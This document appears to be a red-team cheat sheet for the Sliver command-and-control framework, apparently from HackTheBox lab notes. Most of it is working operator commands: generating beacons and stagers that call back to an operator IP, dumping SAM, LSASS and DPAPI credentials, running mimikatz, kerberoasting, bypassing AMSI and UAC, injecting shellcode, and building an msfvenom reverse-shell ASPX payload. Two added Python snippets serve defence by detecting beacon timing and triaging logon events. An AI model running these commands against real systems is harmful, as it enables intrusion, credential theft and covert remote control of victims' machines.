# Sliver

## Installation

### Server Setup

`Sliver`'s `Server` component is the endpoint that implants communicate back to.

`Sliver`'s `Client` component is where the operator runs the commands and tools needed to fulfill their objectives.

{% hint style="info" %}
A downside of not having a server and a client is that everything runs inside the process of Sliver, meaning that if you accidentally terminate the process, you might lose the beacons or sessions.
{% endhint %}

{% code fullWidth="false" %}

```sh
Intrusionz3r0@htb[/htb]$ wget -q https://github.com/BishopFox/sliver/releases/download/vx.x.xx/sliver-server_linux
Intrusionz3r0@htb[/htb]$ chmod +x ./sliver-server_linux
Intrusionz3r0@htb[/htb]$ sudo apt install mingw-w64
```

{% endcode %}

### **Client Setup**

```sh
Intrusionz3r0@htb[/htb]$ wget -q https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-client_linux
Intrusionz3r0@htb[/htb]$ chmod +x ./sliver-client_linux
Intrusionz3r0@htb[/htb]$ ./sliver-client_linux import Intrusionz3r0_10.10.14.5.cfg 
2023/09/27 11:45:03 Saved new client config to: /home/user/.sliver-client/configs/user_ipaddress.cfg
Intrusionz3r0@htb[/htb]$ ./sliver-client_linux 
```

### **Operator profile**

The Sliver server controls who can connect through the operator profiles it generates: each operator gets a client config file, including a client certificate, issued by the server.

```sh
[server] sliver > new-operator -n Intrusionz3r0 -l 10.10.14.5

[*] Generating new client certificate, please wait ... 
[*] Saved new client config to: /opt/silver/Intrusionz3r0_10.10.14.5.cfg 
```

### **Multiplayer mode**

`Sliver` can host multiple operators simultaneously in a mode known as [multiplayer](https://sliver.sh/docs?name=Multi-player+Mode).

```sh
[server] sliver > multiplayer
```

## Armory

```sh
sliver > armory install seatbelt
sliver > armory install <tool-name>
sliver > armory install all
```

## Install external tools

### Example 1: UAC-BOF-Bonanza

```sh
Intrusionz3r0@htb[/htb]$ git clone https://github.com/icyguider/UAC-BOF-Bonanza.git
Intrusionz3r0@htb[/htb]$ cp -rp PATH/UACBypasses/MODULE ~/.sliver-client/extensions/
Intrusionz3r0@htb[/htb]$ cd ~/.sliver-client/extensions/MODULE/; make

#Load modules from Sliver
sliver > extensions load ~/.sliver-client/extensions/MODULE
```

### Example 2: Chisel

```sh
Intrusionz3r0@htb[/htb]$ git clone https://github.com/MrAle98/chisel
Intrusionz3r0@htb[/htb]$ cd chisel/
Intrusionz3r0@htb[/htb]$ mkdir ~/.sliver-client/extensions/chisel
Intrusionz3r0@htb[/htb]$ cp extension.json ~/.sliver-client/extensions/chisel
Intrusionz3r0@htb[/htb]$ make windowsdll_64
Intrusionz3r0@htb[/htb]$ make windowsdll_32
Intrusionz3r0@htb[/htb]$ cp chisel.x64.dll ~/.sliver-client/extensions/chisel/
Intrusionz3r0@htb[/htb]$ cp chisel.x86.dll ~/.sliver-client/extensions/chisel/
```

## Generate Beacons

```sh
sliver > generate beacon --http <your_server_ip>:<PORT> --os linux --arch x86 --format elf --seconds 5 --jitter 3
sliver > generate beacon --mtls <your_server_ip> --os windows --arch amd64 --format exe --save /var/www/html
sliver > generate beacon --http 10.10.14.62:9002 --skip-symbols -N http-beacon
```

* `--jitter` introduces randomness to callback times.
* `--seconds` sets callback interval.
* `--skip-symbols` disables obfuscation (less stealthy).

{% hint style="warning" %}
One of the main disadvantages of skipping the symbol obfuscation is that the beacon will be easily detectable as Sliver due to the imports being presented in plaintext.
{% endhint %}
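The `--seconds` and `--jitter` values leave a recognisable timing pattern in proxy or firewall logs. The following is an added detection example, not part of the original page or of Sliver itself; it assumes each callback gap is the interval plus a random delay of up to the jitter value, and the log entries and host addresses are constructed.

```python
from collections import defaultdict
from itertools import accumulate
from statistics import median


def series(start, gaps):
    """Turn a list of gaps (seconds) into absolute timestamps."""
    return list(accumulate(gaps, initial=start))


# Constructed sample: (source host, epoch seconds) of outbound HTTP requests.
# 10.0.0.23 behaves like "--seconds 5 --jitter 3" with one missed callback;
# 10.0.0.40 is irregular, human-driven traffic.
SAMPLE_LOG = (
    [("10.0.0.23", t) for t in series(1000, [5, 7, 6, 8, 5, 6, 7, 5, 8, 6, 60, 6])]
    + [("10.0.0.40", t) for t in series(1000, [2, 45, 1, 300, 12, 3, 90, 7, 1, 150, 30])]
)


def find_beacons(log, min_gaps=8, tol=0.5, min_share=0.9):
    """Return {host: (estimated_interval, estimated_jitter)} for hosts whose
    request gaps cluster in a narrow band around the median gap.

    tol is the band half-width relative to the median; it suits jitter that
    is smaller than the interval and needs widening for heavier jitter.
    """
    by_host = defaultdict(list)
    for host, ts in log:
        by_host[host].append(ts)

    found = {}
    for host, times in by_host.items():
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        if len(gaps) < min_gaps:
            continue  # too few observations to judge regularity
        mid = median(gaps)
        band = [g for g in gaps if mid * (1 - tol) <= g <= mid * (1 + tol)]
        # Outliers (missed check-ins) are tolerated up to 1 - min_share.
        if len(band) / len(gaps) >= min_share:
            found[host] = (min(band), max(band) - min(band))
    return found


if __name__ == "__main__":
    for host, (interval, jitter) in find_beacons(SAMPLE_LOG).items():
        print(f"{host}: ~{interval}s interval, ~{jitter}s jitter")
```
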

### Listeners

```sh
sliver > http --lport 8088
sliver > http --lhost 10.10.14.62 --lport 9002
sliver > http 
sliver > mtls 
```

## Useful commands

### Execute commands

```sh
sliver (puppet-mtls) > execute -q cmd '/c <COMMAND>'
sliver (puppet-mtls) > execute -o powershell <PSCOMMAND>
sliver (puppet-mtls) > sharpsh -- '-e -c <BASE64-PowershellCommand>'
sliver (puppet-mtls) > execute-assembly /home/user/Rubeus.exe
sliver (puppet-mtls) > inline-execute-assembly /home/user/Rubeus.exe 'kerberoast /format:hashcat /user:alice /nowrap'
```

{% hint style="warning" %}
The `execute` command will open a command prompt or the tool's GUI.
{% endhint %}

### Memory Injection & Shellcode

```sh
#Inject shellcode into a new process
sliver (puppet-mtls) > execute-assembly /home/Intrusionz3r0/Documents/tools/Rubeus.exe createnetonly /program:C:\\windows\\system32\\notepad.exe
sliver (puppet-mtls) > execute-shellcode -p <pid> /home/Intrusionz3r0/Documents/tools/godpotato.bin #Created by donut

#Evade defenses by loading and executing a DLL in a remote process
sideload /path/mimikatz.exe "token::elevate privilege::debug sekurlsa::logonpasswords exit"
```

### Privilege escalation

```sh
#From Administrator to NT Authority System
sliver (TOTAL_NATIONAL) > getsystem
```

### Credentials Attacks

```sh
#DUMP SAM Database
sliver (TOTAL_NATIONAL) > hashdump

#Dump LSA secrets
sliver (TOTAL_NATIONAL) > ps -e lsass
sliver (TOTAL_NATIONAL) > procdump --pid 524 --save /tmp/lsass.dmp

#Dump DPAPI creds
sliver (puppet-mtls) > sharpdpapi machinecredentials
```

### Domain Enumeration

```sh
#Domain Enumeration 
sliver (puppet-mtls) > sharp-hound-4 -s -t 300 -- -c all --zipfilename filename #(Compatible: bloodhound-convert or bloodhound-community)
sliver (puppet-mtls) > sharpview -- <POWERVIEW-COMMAND>
sliver (puppet-mtls) > sharpsh -t 300 -- '-u C:\\temp\\script.ps1 -c Invoke-Method'
sliver (puppet-mtls) > sharpsh -t 300 -- '-u PATH/PowerView.ps1 -e -c <BASE64>' #use base64 command on linux
sliver (http-beacon) > c2tc-domaininfo 
```

### Lateral Movement

```sh
#Impersonation
sliver (http-beacon) > make-token -u svc_sql  -p jkhnrjk123! -d dc.domain.local
sliver (puppet-mtls) > ps
sliver (puppet-mtls) > migrate -p 3908
```

| **Logon Type**            | **Value** | **Description**                                                           | **Typical Use Case**                                                |
| ------------------------- | --------- | ------------------------------------------------------------------------- | ------------------------------------------------------------------- |
| `LOGON_INTERACTIVE`       | 2         | Full login session as if from keyboard input.                             | Run processes locally as a normal user; full access.                |
| `LOGON_NETWORK`           | 3         | For accessing network resources; no full session created.                 | Access remote shares (e.g. `\\server\share`), no process execution. |
| `LOGON_BATCH`             | 4         | Used by scheduled tasks or batch jobs.                                    | Run automated tasks with minimal interaction.                       |
| `LOGON_SERVICE`           | 5         | Used by services running under a user account.                            | Run persistent background services.                                 |
| `LOGON_UNLOCK`            | 7         | Triggered when a user unlocks the workstation.                            | Not typically used in token impersonation.                          |
| `LOGON_NETWORK_CLEARTEXT` | 8         | Like network logon, but with plaintext password.                          | Remote authentication requiring cleartext password.                 |
| `LOGON_NEW_CREDENTIALS`   | 9         | Credentials used only for outbound connections; local identity unchanged. | `runas /netonly` scenarios; access network as another user.         |
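
The numeric values in this table are the same ones Windows records in the `LogonType` field of Security event 4624, so they can be used for triage. The following is an added example, not part of the original page: the event records, account names and process paths are constructed, and it flags type 9 logons whose outbound account differs from the local one, plus type 8 logons.

```python
LOGON_TYPES = {
    2: "LOGON_INTERACTIVE", 3: "LOGON_NETWORK", 4: "LOGON_BATCH",
    5: "LOGON_SERVICE", 7: "LOGON_UNLOCK",
    8: "LOGON_NETWORK_CLEARTEXT", 9: "LOGON_NEW_CREDENTIALS",
}

# Constructed sample: EventData of Security log records, already parsed to dicts.
EVENTS = [
    {"EventID": 4624, "LogonType": "2", "TargetUserName": "alice",
     "TargetOutboundUserName": "-", "ProcessName": r"C:\Windows\System32\svchost.exe"},
    {"EventID": 4624, "LogonType": "9", "TargetUserName": "alice",
     "TargetOutboundUserName": "svc_sql", "ProcessName": r"C:\Users\alice\AppData\update.exe"},
    {"EventID": 4624, "LogonType": "3", "TargetUserName": "bob",
     "TargetOutboundUserName": "-", "ProcessName": "-"},
    {"EventID": 4624, "LogonType": "8", "TargetUserName": "webapp",
     "TargetOutboundUserName": "-", "ProcessName": r"C:\Windows\System32\inetsrv\w3wp.exe"},
    {"EventID": 4634, "LogonType": "9", "TargetUserName": "alice"},  # logoff, ignored
]


def triage(events):
    """Return (logon type name, account detail, calling process) for logons
    that deserve a second look."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4624:
            continue
        logon_type = int(ev["LogonType"])
        name = LOGON_TYPES.get(logon_type, f"UNKNOWN_{logon_type}")
        user = ev.get("TargetUserName", "-")
        outbound = ev.get("TargetOutboundUserName", "-")
        process = ev.get("ProcessName", "-")
        if logon_type == 9 and outbound not in ("-", "", user):
            # Local identity unchanged, different credentials used outbound.
            findings.append((name, f"{user} -> {outbound}", process))
        elif logon_type == 8:
            # A cleartext password was handed to the logon API.
            findings.append((name, user, process))
    return findings


if __name__ == "__main__":
    for finding in triage(EVENTS):
        print(finding)
```
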

### Kerberos

```sh
#Kerberoast
sliver (http-beacon) > inline-execute-assembly /path/Rubeus.exe 'kerberoast /format:hashcat /user:alice /nowrap'
sliver (http-beacon) > c2tc-kerberoast roast alice
sliver (http-beacon) > bof-roast rdp/web01.child.htb.local

#Delegation
sliver (http-beacon) > delegationbof 6 dc.domain.local
```

### ADCS

```sh
#ADCS
sliver (http-beacon) > certify -- find 
sliver (puppet-mtls) > sa-adcs-enum
```

### Windows Enumeration

```sh
#Windows Enumeration
sliver (puppet-mtls) > sa-sc-enum #Enum windows services
sliver (puppet-mtls) > sa-netshares #Enum network shares SMB
sliver (puppet-mtls) > sa-cacls #Enum permissions
sliver (puppet-mtls) > sa-probe 10.10.235.135 22 #Check Open ports
```

### AMSI Bypass

```sh
#Bypass AMSI
sliver (puppet-mtls) > SspiUacBypass 'C:\ProgramData\Puppet\puppet-update.exe'
```

## Miscellaneous

### Execute an unmanaged PowerShell

**Project**: [UnmanagedPowerShell](https://github.com/mmnoureldin/UnmanagedPowerShell?tab=readme-ov-file)

```sh
 ~/Documents/Tools/donut/donut -a 2 -i UnmanagedPowerShell.exe -o UnmanagedPowerShell.bin

  [ Donut shellcode generator v1 (built Apr 30 2025 19:45:41)
  [ Copyright (c) 2019-2021 TheWover, Odzhan

  [ Instance type : Embedded
  [ Module file   : "UnmanagedPowerShell.exe"
  [ Entropy       : Random names + Encryption
  [ File type     : EXE
  [ Target CPU    : amd64
  [ AMSI/WDLP/ETW : continue
  [ PE Headers    : overwrite
  [ Shellcode     : "UnmanagedPowerShell.bin"
  [ Exit          : Thread
```

```sh
sliver (COMBINED_AGLET) > execute-shellcode -i /home/Intrusionz3r0/Documents/Tools/UnmanagedPowerShell.bin

[*] Started remote shell with pid 1888

PS > New-ADIDNSNode -Tombstone -Verbose -Node WIN-Y5CPSL66T45 -DATA 10.8.5.48
```

### **Create a shellcode with MSFVenom and Sliver**

We need to create a profile, a stage-listener, and a stager, and generate a payload through msfvenom.

```sh
sliver > profiles new --http 10.10.14.5:8088 --format shellcode z3r0
sliver > stage-listener --url tcp://10.10.14.5:4443 --profile z3r0
sliver > http -L 10.10.14.5 -l 8088
sliver > generate stager --lhost 10.10.14.5 --lport 4443 --format csharp --save staged.txt

#Lastly create the payload and replace the staged.txt on the sliver.aspx.
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.14.5 LPORT=4443 -f aspx > sliver.aspx
```

